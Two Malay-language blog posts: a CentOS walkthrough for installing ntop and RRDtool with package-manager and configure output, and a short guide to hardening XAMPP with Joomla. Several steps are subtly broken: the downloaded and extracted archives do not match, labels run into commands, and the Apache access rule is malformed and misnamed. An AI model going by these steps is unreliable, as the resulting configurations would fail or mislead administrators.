---> Package libXext-devel.i386 0:1.0.1-2.1 set to be updated
--> Running transaction check
---> Package xorg-x11-proto-devel.i386 0:7.1-9.fc6 set to be updated
--> Processing Dependency: mesa-libGL-devel for package: xorg-x11-proto-devel
---> Package libXdmcp-devel.i386 0:1.0.1-2.1 set to be updated
---> Package libXau-devel.i386 0:1.0.1-3.1 set to be updated
--> Running transaction check
---> Package mesa-libGL-devel.i386 0:6.5.1-7.5.el5 set to be updated
--> Finished Dependency Resolution

Dependencies Resolved

===================================================================
Package Arch Version Repository Size
===================================================================
Installing:
libart_lgpl-devel x86_64 2.3.17-4 rhel-x86_64-server-5 21 k
libart_lgpl-devel i386 2.3.17-4 rhel-x86_64-server-5 21 k
pango-devel i386 1.14.9-3.el5 rhel-x86_64-server-5 280 k
pango-devel x86_64 1.14.9-3.el5 rhel-x86_64-server-5 281 k
Installing for dependencies:
cairo-devel x86_64 1.2.4-5.el5 rhel-x86_64-server-5 131 k
cairo-devel i386 1.2.4-5.el5 rhel-x86_64-server-5 130 k
fontconfig-devel i386 2.4.1-7.el5 rhel-x86_64-server-5 168 k
freetype-devel x86_64 2.2.1-20.el5_2 rhel-x86_64-server-5 151 k
freetype-devel i386 2.2.1-20.el5_2 rhel-x86_64-server-5 151 k
libX11-devel i386 1.0.3-9.el5 rhel-x86_64-server-5 665 k
libXau-devel i386 1.0.1-3.1 rhel-x86_64-server-5 11 k
libXdmcp-devel i386 1.0.1-2.1 rhel-x86_64-server-5 7.6 k
libXext-devel i386 1.0.1-2.1 rhel-x86_64-server-5 57 k
libXft-devel i386 2.1.10-1.1 rhel-x86_64-server-5 16 k
libXrender-devel i386 0.9.1-3.1 rhel-x86_64-server-5 8.9 k
libart_lgpl i386 2.3.17-4 rhel-x86_64-server-5 76 k
libpng-devel i386 2:1.2.10-7.1.el5_0.1 rhel-x86_64-server-5 182 k
libpng-devel x86_64 2:1.2.10-7.1.el5_0.1 rhel-x86_64-server-5 186 k
mesa-libGL-devel i386 6.5.1-7.5.el5 rhel-x86_64-server-5 465 k
xorg-x11-proto-devel i386 7.1-9.fc6 rhel-x86_64-server-5 247 k

Transaction Summary
=====================================================================
Install 20 Package(s)
Update 0 Package(s)
Remove 0 Package(s)

Total download size: 3.2 M
Is this ok [y/N]:

Downloading Packages:
(1/20): libXext-devel-1.0 100% |=========================| 57 kB 00:00
(2/20): freetype-devel-2. 100% |=========================| 151 kB 00:00
(3/20): libXau-devel-1.0. 100% |=========================| 11 kB 00:00
(4/20): libart_lgpl-devel 100% |=========================| 21 kB 00:00
(5/20): libart_lgpl-2.3.1 100% |=========================| 76 kB 00:00
(6/20): cairo-devel-1.2.4 100% |=========================| 130 kB 00:00
(7/20): libpng-devel-1.2. 100% |=========================| 186 kB 00:00
(8/20): cairo-devel-1.2.4 100% |=========================| 131 kB 00:00
(9/20): fontconfig-devel- 100% |=========================| 168 kB 00:00
(10/20): mesa-libGL-devel 100% |=========================| 465 kB 00:01
(11/20): libXdmcp-devel-1 100% |=========================| 7.6 kB 00:00
(12/20): libpng-devel-1.2 100% |=========================| 182 kB 00:00
(13/20): libX11-devel-1.0 100% |=========================| 665 kB 00:02
(14/20): freetype-devel-2 100% |=========================| 151 kB 00:00
(15/20): libXft-devel-2.1 100% |=========================| 16 kB 00:00
(16/20): pango-devel-1.14 100% |=========================| 281 kB 00:01
(17/20): pango-devel-1.14 100% |=========================| 280 kB 00:01
(18/20): libXrender-devel 100% |=========================| 8.9 kB 00:00
(19/20): libart_lgpl-deve 100% |=========================| 21 kB 00:00
(20/20): xorg-x11-proto-d 100% |=========================| 247 kB 00:01
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing: libart_lgpl ####################### [ 1/20]
Installing: freetype-devel ####################### [ 2/20]
Installing: fontconfig-devel ####################### [ 3/20]
Installing: libpng-devel ####################### [ 4/20]
Installing: libXau-devel ####################### [ 5/20]
Installing: libart_lgpl-devel ####################### [ 6/20]
Installing: libart_lgpl-devel ####################### [ 7/20]
Installing: libpng-devel ####################### [ 8/20]
Installing: freetype-devel ####################### [ 9/20]
Installing: xorg-x11-proto-devel ####################### [10/20]
Installing: libX11-devel ####################### [11/20]
Installing: libXrender-devel ####################### [12/20]
Installing: libXft-devel ####################### [13/20]
Installing: cairo-devel ####################### [14/20]
Installing: libXext-devel ####################### [15/20]
Installing: pango-devel ####################### [16/20]
Installing: pango-devel ####################### [17/20]
Installing: libXdmcp-devel ####################### [18/20]
Installing: mesa-libGL-devel ####################### [19/20]
Installing: cairo-devel ####################### [20/20]

Installed: libart_lgpl-devel.x86_64 0:2.3.17-4 libart_lgpl-devel.i386 0:2.3.17-4 pango-devel.i386 0:1.14.9-3.el5 pango-devel.x86_64 0:1.14.9-3.el5
Dependency Installed: cairo-devel.x86_64 0:1.2.4-5.el5 cairo-devel.i386 0:1.2.4-5.el5 fontconfig-devel.i386 0:2.4.1-7.el5 freetype-devel.x86_64 0:2.2.1-20.el5_2 freetype-devel.i386 0:2.2.1-20.el5_2 libX11-devel.i386 0:1.0.3-9.el5 libXau-devel.i386 0:1.0.1-3.1 libXdmcp-devel.i386 0:1.0.1-2.1 libXext-devel.i386 0:1.0.1-2.1 libXft-devel.i386 0:2.1.10-1.1 libXrender-devel.i386 0:0.9.1-3.1 libart_lgpl.i386 0:2.3.17-4 libpng-devel.i386 2:1.2.10-7.1.el5_0.1 libpng-devel.x86_64 2:1.2.10-7.1.el5_0.1 mesa-libGL-devel.i386 0:6.5.1-7.5.el5 xorg-x11-proto-devel.i386 0:7.1-9.fc6
Complete!

STEP 2

# cd /opt/
# wget http://oss.oetiker.ch/rrdtool/pub/rrdtool-1.3.1.tar.gz
# tar -zxvf ntop-3.3.6.tar.gzSTEP 3
# export PKG_CONFIG_PATH=/usr/lib/pkgconfig/
# ./configure

Sampel Result :

config.status: executing default-1 commands
config.status: executing intltool commands
config.status: executing default commands
config.status: executing po/stamp-it commands
checking in... and out again
ordering CD from http://tobi.oetiker.ch/wish .... just kidding

----------------------------------------------------------------
Config is DONE!

With MMAP IO: yes
Static programs: no
Perl Modules: perl_piped perl_shared
Perl Binary: /usr/bin/perl
Perl Version: 5.8.8
Perl Options: PREFIX=/usr/local/rrdtool-1.3.1 LIB=/usr/local/rrdtool-1.3.1/lib/perl/5.8.8
Ruby Modules:
Ruby Binary: no
Ruby Options: sitedir=$(DESTDIR)NONE/lib/ruby
Build Tcl Bindings: no
Build Python Bindings: yes
Build rrdcgi: yes
Build librrd MT: yes
Link with libintl: yes

Libraries: -lxml2 -lcairo -lcairo -lcairo -lm -lcairo -lpng12 -lpangocairo-1.0 -lpango-1.0 -lcairo -lgobject-2.0 -lgmodule-2.0 -ldl -lglib-2.0

Type 'make' to compile the software and use 'make install' to
install everything to: /usr/local/rrdtool-1.3.1.

... that wishlist is NO JOKE. If you find RRDtool useful
make me happy. Go to http://tobi.oetiker.ch/wish and
place an order.

-- Tobi Oetiker
----------------------------------------------------------------

Compile dan Install :
# make
# make install
# cd /usr/local/
# ln -s rrdtool-1.3.1/ rrdtool/
# cd rrdtool
# ls -l

Cara nak sahkan RRDTool berfungsi :
# cd /usr/local/rrdtool/share/rrdtool/examples/
# ./stripes.pl
# ls -l
# cp stripes.png /var/www/html/

Buka Firefox dan layari link berikut :
http://your-domain.com/stripes.png

* Semasa compile tadi kita boleh tukar default location RRDTool tu ke tempat lain. By default ianya di install di sini : /usr/local/rrdtool-1.3.1/
# ./configure --prefix=/usr/local/rrdtool
# make install

2) Install libpcap :

# yum install libpcap-devel libpcap
# cd ntop
# ./autogen.sh
# make
# make install
# make install-data-as3) Wujudkan user NTOP anda :
# useradd -M -s /sbin/nologin -r ntop

4) Setup directory permission :

# chown ntop:root /usr/local/var/ntop/
# chown ntop:ntop /usr/local/share/ntop/

5) Setup NTOP user admin :

# ntop -A

Sampel result :
Mon Jul 28 03:38:34 2008 NOTE: Interface merge enabled by default
Mon Jul 28 03:38:34 2008 Initializing gdbm databases

ntop startup - waiting for user response!

Please enter the password for the admin user:
Please enter the password again:

Mon Jul 28 03:38:42 2008 Admin user password has been set

6) Start NTOP :

# /usr/local/bin/ntop -d -L -u ntop -P /usr/local/var/ntop --skip-version-check --use-syslog=daemon

Sampel result :

Mon Jul 28 03:42:19 2008 NOTE: Interface merge enabled by default
Mon Jul 28 03:42:19 2008 Initializing gdbm databases

Sekiranya anda ada banyak network interface (bagi yang setup NTOP pada gateway network-eth0,eth1,eth2) :
# /usr/local/bin/ntop -i "eth0,eth1" -d -L -u ntop -P /usr/local/var/ntop --skip-version-check --use-syslog=daemon

Maksud singkatan command tu :

-i "eth0,eth1" : Tentukan network interface yang akan dibuat monitoring.
-d : Run ntop sebagai daemon.
-L : Hantar log mesej ke sistem log (/var/log/messages) selain paparan pada screen-u ntop : Start ntop sebagai ntop user
-P /usr/local/var/ntop : Tentukan kat mana ntop simpan fail database. Anda mungkin memerlukan database tersebut sebagai sebahagian dari program pemulihan nanti.
--skip-version-check : Secara default, ntop akan mencapai remote file secara semakan berkala bagi memastikan versi terkini sedang digunakan. Fungsi ini disablekannya.
--use-syslog=daemon : Gunakan syslog daemon.

7) Cara layari NTOP anda :

http://localhost:3000/ ATAU http://server-ip:3000/

8) Jika menggunakan firewall iptables, pastikan enable port 3000 :

# nano /etc/sysconfig/iptables

Masukkan sebelum final REJECT line :
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 3000 -j ACCEPT

# service iptables restart

Untuk shorewall pastikan filter ip dan port 3000 dimasukkan. Boleh guna Webmin.

Kalau tanak open port 3000, boleh guna cara ssh tunnel :
$ ssh -L 3000:localhost:3000 -N -f user@server.yourcorp.com

Buka browser anda dan layari :
http://localhost:3000/

9) Start NTOP on boot :

# nano /etc/rc.local

Masukkan line berikut :
/usr/local/bin/ntop -i "eth0,eth1" -d -L -u ntop -P /usr/local/var/ntop --skip-version-check --use-syslog=daemon

Save dan close

10) Cara nak stop NTOP :

# killall ntop

Yeh! anda dah pun berjaya setup NTOP di Centos anda...ahaks best!
Terima kasih kepada panduan nota cyberciti

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Secure XAMPP with Joomla

2009-04-28T10:27:00.004+08:00

Tahap penggunaan perisian Open Source untuk tujuan pembangunan Web pada masa kini semakin popular memandangkan kos yang rendah dan tidak terikat dengan vendor.

Namun kita kurang ambil perhatian tentang kepentingan tahap keselamatan terhadap perisian yang kita gunakan tersebut. Kebiasaannya kita akan download dan install seterusnya guna sahaja. Sememang kita tahu ianya percuma namun pernahkah kita terfikir yang ianya juga ciptaan manusia dan tiada yang sempurna pada ciptaan manusia selain ciptaanNYA...wah bertazkirah lak sesambil tu...ahaks..

Jadi mungkin bagi yang ingin membina sebuah website sendiri perlu ambil perhatian tentang isu kawalan keselamatan ni. Lagi-lagi sekarang ni asal buat portal sahaja pasti akan tertumpu kepada perisian Joomla yang merupakan perisian sumber terbuka yang komprehensif untuk menjadikan Portal anda memenuhi spesifikasi Web 2.0 iaitu merangkumi semua bentuk fungsi sebagai pemberi maklumat, penghubung komuniti, pemudah carian dan pelbagai lagi...

Kaedah yang biasa kita terfikir untuk setup sebuah Portal server adalah menggunakan perisian XAMPP yang tersedia dengan installer untuk PHP, MYSQL, APACHE, FILEZILLA FTP, WEBALIZER dan PHPMYADMIN. Sebenarnya kalau diikutkan XAMPP hanya sesuai digunakan untuk tujuan DEVELOPMENT SERVER SAHAJA...tapi kita dah salahgunakan untuk tujuan LIVE PORTAL...aduiyaiii...Untuk pengetahuan semua juga dalam Web XAMPP ada dinyatakan kaedah untuk secure pada XAMPP yang mereka bangunkan. Tapi kita jarang ambil penting tentang perkara tersebut. Jika dilihat dari sudut mudah semua dah ada dalam satu installer memang cantik jika dilaksanakan untuk server Windows. Namun jika pelaksanaan untuk server CentOS tidak digalakkan menggunakan XAMPP atau LAMPP dalam Linux. Seeloknya dibuat instalasi berasingan.

Ok setel bebelan untuk XAMPP...
13 Langkah untuk securekan XAMPP adalah seperti di bawah :
(Rujukan dari http://www.robsnotebook.com)

1) Gunakan XAMPP Security Page untuk kawalan password /xampp dan phpmyadmin pengguna root. LANJUT DISINI
2) Buang semua folder yang tidak digunakan dan kesemua maklumat di dalam fail config. LANJUT DISINI
3) Buang script default dari cgi-bin directory. LANJUT DISINI
4) Wujudkan "pma" password yang tidak dibuat pada Security Script Page dan Password Protect untuk folder yang lain. LANJUT DISINI
5) Buangkan default user/password yang dimasukkan ke dalam FTP Server, WebDAV Server dan Web Accessible Folder. LANJUT DISINI
6) Encrypt semasa password di hantar. LANJUT DISINI
7) Setup Apache and MySQL supaya berfungsi pada user account dan hadkan akses kepada filesystem
8) Kawal akseskepada WebDAV server dan FTP Server.
9) Hadkan atau buang akses kepada /server-info dan /server-status
10) Buang fungsi dicari oleh sebarang search engine daripada senaraikan website anda dalam keputusan carian
11) Buang fungsi directory listings
12) Buang apache error version info yang dipaparkan pada bawah page setiap error page.
13) Buangkan apache version info yang dinyatakan pada http://requests yang mana browser tidak paparkan

Okeh sekarang ni kita nak securekan XAMPP bersama joomla. Untuk securekan joomla ni mungkin kena buat artikel lain untuknya...

So Kita tahu fungsi joomla membolehkan webmaster kemaskini portal secara online. Jika kita cuba browse sebarang website yang menggunakan joomla kita boleh cuba masukkan url berikut :
http:///robots.txt.
Anda akan nampak paparan seperti berikut :

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/

So dari situ kita akan tahu folder yang available di portal menggunakan joomla ni. Jadi hackers akan cuba mendapatkan cara untuk akses kepada administrator page semestinya...Daripada ayat tersebut seperti ianya tidak membenarkan capaian kepada folder tersebut tapi hackers akan terus mencuba...

Kaedah untuk kawalan

1) Buang file robots.txt tersebut dari server portal joomla.
2) Edit fail httpd-xampp.conf (c:/xampp/apache/conf/extra/)
Tambahkan simple rule berikut untuk disable akses kepada folder /administrator :
Alias /phpmyadmin "C:/xampp/htdocs/joomla/administrator/"

AllowOverride AuthConfig
Order allow,deny
Allow from 192.168.1.0/24 localhost

Rule tersebut hanya membenarkan akses dari LAN 192.168.1.0/24 dan di server sahaja.

Hopefully maklumat membantu...

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com